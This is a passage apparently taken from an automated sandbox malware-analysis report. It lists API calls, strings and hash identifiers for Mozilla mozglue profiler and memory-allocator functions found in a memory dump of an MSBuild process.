ReleaseSRWLockExclusive.KERNEL32(?), ref: 6C4ED279
free.MOZGLUE(?), ref: 6C4ED2B2

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ExclusiveLock$AcquireCurrentReleaseThread$freemoz_malloc_usable_size
String ID:
API String ID: 3049780610-0
Opcode ID: 0aab46d6b19283303c0df260ea7a810bdcb203cfa4d550fccf2f981895330fea
Instruction ID: 32e208e6f15cd8fc6119a5cf4e71d6e96766809aeb34def5204912cc087330b3
Opcode Fuzzy Hash: 0aab46d6b19283303c0df260ea7a810bdcb203cfa4d550fccf2f981895330fea
Instruction Fuzzy Hash: 00218D716043059BCB04DF24C888E9EB7B1FF8E325F11062EE51687740DB30A809CB96

Function 6C4DF5B0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 70threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C4CCBE8: GetCurrentProcess.KERNEL32(?,6C4931A7), ref: 6C4CCBF1
Part of subcall function 6C4CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C4931A7), ref: 6C4CCBFA

Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4A4A68), ref: 6C4D945E
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C4D9470
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C4D9482
Part of subcall function 6C4D9420: __Init_thread_footer.LIBCMT ref: 6C4D949F

GetCurrentThreadId.KERNEL32 ref: 6C4DF619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C4DF598), ref: 6C4DF621

Part of subcall function 6C4D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C4D94EE
Part of subcall function 6C4D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C4D9508

GetCurrentThreadId.KERNEL32 ref: 6C4DF637
AcquireSRWLockExclusive.KERNEL32(6C51F4B8,?,?,00000000,?,6C4DF598), ref: 6C4DF645
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8,?,?,00000000,?,6C4DF598), ref: 6C4DF663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C4DF62A

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Currentgetenv$ExclusiveLockProcessThread$AcquireInit_thread_footerReleaseTerminate__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 1579816589-753366533
Opcode ID: 8685360456fbf096c8e6efba76452a169112ac9b8c1d128607c882cc1e803bab
Instruction ID: 4a4ffe64f1a97ed2b23943f97f30022c07386a769e160ed01b58f91c528a48f7
Opcode Fuzzy Hash: 8685360456fbf096c8e6efba76452a169112ac9b8c1d128607c882cc1e803bab
Instruction Fuzzy Hash: 8B11E775205204ABEB14FF59DC5DD957BB9FB86369B160019EA0583F02CB72BC22CBE4

Function 6C4A2070 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 68libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C4CAB89: EnterCriticalSection.KERNEL32(6C51E370,?,?,?,6C4934DE,6C51F6CC,?,?,?,?,?,?,?,6C493284), ref: 6C4CAB94
Part of subcall function 6C4CAB89: LeaveCriticalSection.KERNEL32(6C51E370,?,6C4934DE,6C51F6CC,?,?,?,?,?,?,?,6C493284,?,?,6C4B56F6), ref: 6C4CABD1

LoadLibraryW.KERNEL32(combase.dll,6C4A1C5F), ref: 6C4A20AE
GetProcAddress.KERNEL32(00000000,CoInitializeSecurity), ref: 6C4A20CD
__Init_thread_footer.LIBCMT ref: 6C4A20E1
FreeLibrary.KERNEL32 ref: 6C4A2124

Strings

combase.dll, xrefs: 6C4A20A9
CoInitializeSecurity, xrefs: 6C4A20C7

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeSecurity$combase.dll
API String ID: 4190559335-2476802802
Opcode ID: 69b081660f07a31c48b2355d41258f6087cdaecea87ef0be65d8780fdcb1af8c
Instruction ID: 052f7b51215da105c1221383a170436e6a6696d94c90271d2900156a5bf2554e
Opcode Fuzzy Hash: 69b081660f07a31c48b2355d41258f6087cdaecea87ef0be65d8780fdcb1af8c
Instruction Fuzzy Hash: 94219A76200209AFDF10CF96DC4ED8A3B76FB0A325F024218FA0892A11E7319862DF95

Function 6C4F76C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 6C4F76F2
moz_xmalloc.MOZGLUE(00000001), ref: 6C4F7705

Part of subcall function 6C4ACA10: malloc.MOZGLUE(?), ref: 6C4ACA26

memset.VCRUNTIME140(00000000,00000000,00000001), ref: 6C4F7717
WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,6C4F778F,00000000,00000000,00000000,00000000), ref: 6C4F7731
free.MOZGLUE(00000000), ref: 6C4F7760

Strings

}>Ml, xrefs: 6C4F76C4

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: ByteCharMultiWide$freemallocmemsetmoz_xmalloc
String ID: }>Ml
API String ID: 2538299546-2536993788
Opcode ID: 8c05f1f51a92b0da694070c800e8301ce4173d10eaf0daf6cb57fe3a81fabbae
Instruction ID: fc2e937365a4f89f3470a829f32e2cc917336dba70705f8504cfc3b9a9ecaec9
Opcode Fuzzy Hash: 8c05f1f51a92b0da694070c800e8301ce4173d10eaf0daf6cb57fe3a81fabbae
Instruction Fuzzy Hash: EA11B2B1D05215ABE710AFB69C44FABBEE8EF86354F044429F888E7700E7759C4087E2

Function 6C4D99A0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 62threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4A4A68), ref: 6C4D945E
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C4D9470
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C4D9482
Part of subcall function 6C4D9420: __Init_thread_footer.LIBCMT ref: 6C4D949F

GetCurrentThreadId.KERNEL32 ref: 6C4D99C1
AcquireSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4D99CE
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4D99F8
GetCurrentThreadId.KERNEL32 ref: 6C4D9A05
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4D9A0D

Part of subcall function 6C4D9A60: GetCurrentThreadId.KERNEL32 ref: 6C4D9A95
Part of subcall function 6C4D9A60: _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4D9A9D
Part of subcall function 6C4D9A60: ?profiler_time@baseprofiler@mozilla@@YANXZ.MOZGLUE ref: 6C4D9ACC
Part of subcall function 6C4D9A60: ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6C4D9BA7
Part of subcall function 6C4D9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000), ref: 6C4D9BB8
Part of subcall function 6C4D9A60: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(00000000,00000000), ref: 6C4D9BC9

Part of subcall function 6C4CCBE8: GetCurrentProcess.KERNEL32(?,6C4931A7), ref: 6C4CCBF1
Part of subcall function 6C4CCBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6C4931A7), ref: 6C4CCBFA

Strings

[I %d/%d] profiler_stream_json_for_this_process, xrefs: 6C4D9A15

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Current$ThreadTimegetenv$ExclusiveLockProcessStampV01@@Value@mozilla@@_getpid$?profiler_time@baseprofiler@mozilla@@AcquireInit_thread_footerNow@ReleaseStamp@mozilla@@TerminateV12@_
String ID: [I %d/%d] profiler_stream_json_for_this_process
API String ID: 2359002670-141131661
Opcode ID: 88db5febee8836f5ec17e30773378d151422411801f2d52afcdb4aeb2053e462
Instruction ID: 8ef6de1e0d45dd1cc69f94099394b93694a0462f00c46d888b54d28cc2024bd9
Opcode Fuzzy Hash: 88db5febee8836f5ec17e30773378d151422411801f2d52afcdb4aeb2053e462
Instruction Fuzzy Hash: B40148766081209BEB00BF169C3EFA53B74EB52259F07025AED0983F01DB761801C6AA

Function 6C4A1FA0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 60libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C4CAB89: EnterCriticalSection.KERNEL32(6C51E370,?,?,?,6C4934DE,6C51F6CC,?,?,?,?,?,?,?,6C493284), ref: 6C4CAB94
Part of subcall function 6C4CAB89: LeaveCriticalSection.KERNEL32(6C51E370,?,6C4934DE,6C51F6CC,?,?,?,?,?,?,?,6C493284,?,?,6C4B56F6), ref: 6C4CABD1

LoadLibraryW.KERNEL32(combase.dll,?), ref: 6C4A1FDE
GetProcAddress.KERNEL32(00000000,CoCreateInstance), ref: 6C4A1FFD
__Init_thread_footer.LIBCMT ref: 6C4A2011
FreeLibrary.KERNEL32 ref: 6C4A2059

Strings

CoCreateInstance, xrefs: 6C4A1FF7
combase.dll, xrefs: 6C4A1FD9

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoCreateInstance$combase.dll
API String ID: 4190559335-2197658831
Opcode ID: 522af03ad70fcb0b9ab703bc854fddba8802ea1eab2801e81e177386b51864dd
Instruction ID: e08ad2d9296f4c2fb827f9d0b740d194c9b3e564a2b035976866ae6b86a2e824
Opcode Fuzzy Hash: 522af03ad70fcb0b9ab703bc854fddba8802ea1eab2801e81e177386b51864dd
Instruction Fuzzy Hash: 6D1181B8205204AFEF20DF56CC4EE563B79EB56359F024219FA0892F51EB309C11DFA5

Function 6C4A0EE0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 51libraryloaderCOMMON

Download Yara Rule

APIs

Part of subcall function 6C4CAB89: EnterCriticalSection.KERNEL32(6C51E370,?,?,?,6C4934DE,6C51F6CC,?,?,?,?,?,?,?,6C493284), ref: 6C4CAB94
Part of subcall function 6C4CAB89: LeaveCriticalSection.KERNEL32(6C51E370,?,6C4934DE,6C51F6CC,?,?,?,?,?,?,?,6C493284,?,?,6C4B56F6), ref: 6C4CABD1

LoadLibraryW.KERNEL32(combase.dll,00000000,?,6C4CD9F0,00000000), ref: 6C4A0F1D
GetProcAddress.KERNEL32(00000000,CoInitializeEx), ref: 6C4A0F3C
__Init_thread_footer.LIBCMT ref: 6C4A0F50
FreeLibrary.KERNEL32(?,6C4CD9F0,00000000), ref: 6C4A0F86

Strings

CoInitializeEx, xrefs: 6C4A0F36
combase.dll, xrefs: 6C4A0F18

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: CriticalLibrarySection$AddressEnterFreeInit_thread_footerLeaveLoadProc
String ID: CoInitializeEx$combase.dll
API String ID: 4190559335-2063391169
Opcode ID: 456ea8634dd01902c7b0d8facd1f4ec208f50862a47296dd3b93b265e7def7f8
Instruction ID: 6e0c3deb1cdc529eda8b359a02b634b13f7ee5e3ef413888efa3f4273979ddb8
Opcode Fuzzy Hash: 456ea8634dd01902c7b0d8facd1f4ec208f50862a47296dd3b93b265e7def7f8
Instruction Fuzzy Hash: 34115E74705240DBDF00DF94CD0EF4A3BB5EB5A326F02432AF906A2F42D770A406CA5A

Function 6C4DF540 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4A4A68), ref: 6C4D945E
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C4D9470
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C4D9482
Part of subcall function 6C4D9420: __Init_thread_footer.LIBCMT ref: 6C4D949F

GetCurrentThreadId.KERNEL32 ref: 6C4DF559
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6C4DF561

Part of subcall function 6C4D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C4D94EE
Part of subcall function 6C4D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C4D9508

GetCurrentThreadId.KERNEL32 ref: 6C4DF577
AcquireSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DF585
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8), ref: 6C4DF5A3

Strings

[I %d/%d] profiler_pause_sampling, xrefs: 6C4DF3A8
[I %d/%d] profiler_resume, xrefs: 6C4DF239
[I %d/%d] profiler_resume_sampling, xrefs: 6C4DF499
[D %d/%d] profiler_add_sampled_counter(%s), xrefs: 6C4DF56A

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_add_sampled_counter(%s)$[I %d/%d] profiler_pause_sampling$[I %d/%d] profiler_resume$[I %d/%d] profiler_resume_sampling
API String ID: 2848912005-2840072211
Opcode ID: f0c006a7afdf0967c6348c245ee4620f21b57a0ca1d0bed5b7b4d66779106109
Instruction ID: 4b24ce25734df65b52bf6f3524bfb5a41da2a759b8600e900faa0e6c4df2c25d
Opcode Fuzzy Hash: f0c006a7afdf0967c6348c245ee4620f21b57a0ca1d0bed5b7b4d66779106109
Instruction Fuzzy Hash: 36F0BBB52001009FEA00BB659C5DE5977BCEB852ADF020115FA05C3F02DB765C0187A9

Function 6C4A0E40 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryW.KERNEL32(kernel32.dll,6C4A0DF8), ref: 6C4A0E82
GetProcAddress.KERNEL32(00000000,GetProcessMitigationPolicy), ref: 6C4A0EA1
__Init_thread_footer.LIBCMT ref: 6C4A0EB5
FreeLibrary.KERNEL32 ref: 6C4A0EC5

Strings

GetProcessMitigationPolicy, xrefs: 6C4A0E9B
kernel32.dll, xrefs: 6C4A0E7D

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: Library$AddressFreeInit_thread_footerLoadProc
String ID: GetProcessMitigationPolicy$kernel32.dll
API String ID: 391052410-1680159014
Opcode ID: 98e5f8f196507df26f4c7a6c4e961ba200d93528c2b662747cc6b3f4dce23fe0
Instruction ID: e93997ec5a440ea1cc2a5bdf8afe07134d78c5afe48992c7efbfe57990ad1bbf
Opcode Fuzzy Hash: 98e5f8f196507df26f4c7a6c4e961ba200d93528c2b662747cc6b3f4dce23fe0
Instruction Fuzzy Hash: A1014B747002818BEF00DFE8CD5EE4237B6E717319F124729D90682F64D770A406DA8A

Function 6C4DF600 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36threadCOMMON

Download Yara Rule

APIs

Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6C4A4A68), ref: 6C4D945E
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6C4D9470
Part of subcall function 6C4D9420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6C4D9482
Part of subcall function 6C4D9420: __Init_thread_footer.LIBCMT ref: 6C4D949F

GetCurrentThreadId.KERNEL32 ref: 6C4DF619
_getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,00000000,?,6C4DF598), ref: 6C4DF621

Part of subcall function 6C4D94D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6C4D94EE
Part of subcall function 6C4D94D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6C4D9508

GetCurrentThreadId.KERNEL32 ref: 6C4DF637
AcquireSRWLockExclusive.KERNEL32(6C51F4B8,?,?,00000000,?,6C4DF598), ref: 6C4DF645
ReleaseSRWLockExclusive.KERNEL32(6C51F4B8,?,?,00000000,?,6C4DF598), ref: 6C4DF663

Strings

[D %d/%d] profiler_remove_sampled_counter(%s), xrefs: 6C4DF62A

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: getenv$CurrentExclusiveLockThread$AcquireInit_thread_footerRelease__acrt_iob_func__stdio_common_vfprintf_getpid
String ID: [D %d/%d] profiler_remove_sampled_counter(%s)
API String ID: 2848912005-753366533
Opcode ID: 211c3f80d5d186b60623d86b8260b923529a894e48d4bdca31a3568ce601dc63
Instruction ID: e5b9b62a28a989350b188b87bf96adfe273399e906814d45ed47114db48ff86a
Opcode Fuzzy Hash: 211c3f80d5d186b60623d86b8260b923529a894e48d4bdca31a3568ce601dc63
Instruction Fuzzy Hash: 6CF0B4B5204200AFEA00BB658C5EE5A7BBCEB8629DF060115FA05C3F02CB765C0287A9

Function 6C4D05F0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 31stringCOMMON

Download Yara Rule

APIs

strlen.API-MS-WIN-CRT-STRING-L1-1-0(<jemalloc>,?,?,?,?,6C4CCFAE,?,?,?,6C4931A7), ref: 6C4D05FB
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,<jemalloc>,00000000,6C4CCFAE,?,?,?,6C4931A7), ref: 6C4D0616
strlen.API-MS-WIN-CRT-STRING-L1-1-0(: (malloc) Error in VirtualFree(),?,?,?,?,?,?,?,6C4931A7), ref: 6C4D061C
_write.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,: (malloc) Error in VirtualFree(),00000000,?,?,?,?,?,?,?,?,6C4931A7), ref: 6C4D0627

Strings

: (malloc) Error in VirtualFree(), xrefs: 6C4D061B, 6C4D0625
<jemalloc>, xrefs: 6C4D05FA, 6C4D060F

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: _writestrlen
String ID: : (malloc) Error in VirtualFree()$<jemalloc>
API String ID: 2723441310-2186867486
Opcode ID: 3974e575a49a06f01a4f87d728e78bc7e5a01f97fc4203c0c40338c8dea84c5b
Instruction ID: 7f049699f235d5075bdade05c845e7630c4d7c973505613467d84df847fd99cb
Opcode Fuzzy Hash: 3974e575a49a06f01a4f87d728e78bc7e5a01f97fc4203c0c40338c8dea84c5b
Instruction Fuzzy Hash: D7E08CE2A1101037F524225AAC8AEFB761CDBC6134F090039FD0D82301EA4ABD1A51F7

Function 6C4E9240 Relevance: 9.3, APIs: 6, Instructions: 289timeCOMMON

Download Yara Rule

APIs

??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C4E9BAE
free.MOZGLUE(?,?), ref: 6C4E9BC3
free.MOZGLUE(?,?), ref: 6C4E9BD9

Part of subcall function 6C4E93B0: ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(?), ref: 6C4E94C8
Part of subcall function 6C4E93B0: free.MOZGLUE(6C4E9281,?), ref: 6C4E94DD

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID: free$StampTimeV01@@Value@mozilla@@
String ID:
API String ID: 956590011-0
Opcode ID: 854e512acc1e7dbc878a7fe7fa3b909da05ce998f408f454dbc1548afcafbbd8
Instruction ID: 216d49c7bb4eaadc4a98ed11a4845a7d70ef924b16f1f2a2ce6c3f746076ddc1
Opcode Fuzzy Hash: 854e512acc1e7dbc878a7fe7fa3b909da05ce998f408f454dbc1548afcafbbd8
Instruction Fuzzy Hash: 70B1AE71A047058BCB01CF58C880DAEF3F5BF99329B15461DE859AB781EB32E946CBD1

Function 6C4A05F0 Relevance: 9.2, APIs: 6, Instructions: 226COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

Associated: 00000001.00000002.3381970671.000000006C490000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382183026.000000006C50D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382246299.000000006C51E000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000001.00000002.3382282482.000000006C522000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6c490000_MSBuild.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e85b570f9ba2bca4e23748f96e20870be4322a6240425ad2d18a67741ed62943
Instruction ID: 7378da51f56aafcba6a0b174bbdcda131ceb63af1256a8c19cf7e3e3923c0151
Opcode Fuzzy Hash: e85b570f9ba2bca4e23748f96e20870be4322a6240425ad2d18a67741ed62943
Instruction Fuzzy Hash: 3AA147B4A01645CFDB24CF69C984E9AFBF1BF59304F44866ED44A97B00E730A946CFA0

Function 6C4D71A0 Relevance: 9.2, APIs: 2, Strings: 4, Instructions: 212COMMON

Download Yara Rule

APIs

Part of subcall function 6C4D6060: moz_xmalloc.MOZGLUE(00000024,FB1F724F,00000000,?,00000000,?,?,6C4D5FCB,6C4D79A3), ref: 6C4D6078

free.MOZGLUE(-00000001), ref: 6C4D72F6
free.MOZGLUE(?), ref: 6C4D7311

Strings

Spliced unique strings, xrefs: 6C4D7340
333s, xrefs: 6C4D731B
Copied unique strings, xrefs: 6C4D7320
333s, xrefs: 6C4D7226

Memory Dump Source

Source File: 00000001.00000002.3381990164.000000006C491000.00000020.00000001.01000000.00000008.sdmp, Offset: 6C490000, based on PE: true

